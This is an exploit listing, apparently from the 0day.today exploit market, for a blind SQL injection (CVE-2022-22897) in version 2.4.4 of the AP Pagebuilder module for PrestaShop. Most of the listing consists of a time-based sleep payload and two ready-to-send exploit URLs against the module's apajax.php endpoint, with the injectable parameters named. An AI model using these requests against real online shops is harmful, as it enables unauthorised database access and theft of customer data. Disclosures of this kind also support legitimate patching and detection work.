[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PrestaShop Ap Pagebuilder 2.4.4 SQL Injection Vulnerability

Author
Mohamed Ali Hammami
Risk
[
Security Risk High
]
0day-ID
0day-ID-37924
Category
web applications
Date add
25-08-2022
CVE
CVE-2022-22897
Platform
php
# Exploit Title:  AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
#CVE: CVE-2022-22897

Parameters: product_all_one_img,image_product

Payload: 1) or sleep(4) #

Exploit:
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1

#  0day.today [2024-07-03]  #